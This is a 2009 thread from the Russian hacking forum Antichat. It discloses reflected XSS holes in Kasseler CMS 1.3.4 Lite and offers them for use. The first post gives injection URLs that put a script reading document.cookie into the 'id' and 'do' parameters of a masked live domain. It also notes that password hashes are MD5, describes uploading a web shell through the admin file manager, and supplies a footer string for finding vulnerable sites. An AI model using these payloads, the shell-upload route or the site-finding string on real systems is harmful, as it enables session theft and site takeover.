Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Немного XSS в Kasseler CMS 1.3.4 Lite (https://forum.antichat.xyz/showthread.php?t=103275)

Kraneg 27.01.2009 11:14
Немного XSS в Kasseler CMS 1.3.4 Lite
 
Kasseler CMS 1.3.4 Lite возможно и ранние версии
http://www.kasseler-cms.net/


Пасивные XSS:

1.http://*****.ru/index.php?module=News&do=View&id=<script>alert(doc ument.cookie)</script>
или
2.http://*****.ru/index.php?module=News&do=<script>alert(document.co okie)</script>&id=1

Вообще вместо этих ссылок можно использовать любую... Уязвимые параметры ID и DO именно в них и прокатывает пасивка

hash - md5

Заливка шела:
Переходим в админку -> Файловый менеджер -> Выбираем нужный нам каталог -> и внизу можно залить файлы в него

Как искать:
by Kasseler CMS. All rights reserved.

Если что то не так прошу меня поправить... =) Все таки первое что нашел сам =)

Kraneg 27.01.2009 13:44
Qam Да??? =)) А такая есть? =)
Все увидел энциклопедию... =) надо было туда закинуть... Сори за невнимательность =)

Qam 27.01.2009 13:46
Есть про пасивные хсс зато!

Kraneg 27.01.2009 13:50
Qam хм не вижу... =) вобщем спор не имеет смысла так как тема уже создана и удалить я не могу... =) впрочем в седующий раз напишу в энциклопедию

Qam 27.01.2009 13:53
Цитата:
Сообщение от Kraneg
Qam это в теме про чаты...
прошу прощение Kraneg,видал тему про активные хсс и привидилось что и про пасивные есть!Вообщем извеняй дружище!Молодец побольше таких бы...


Время: 11:13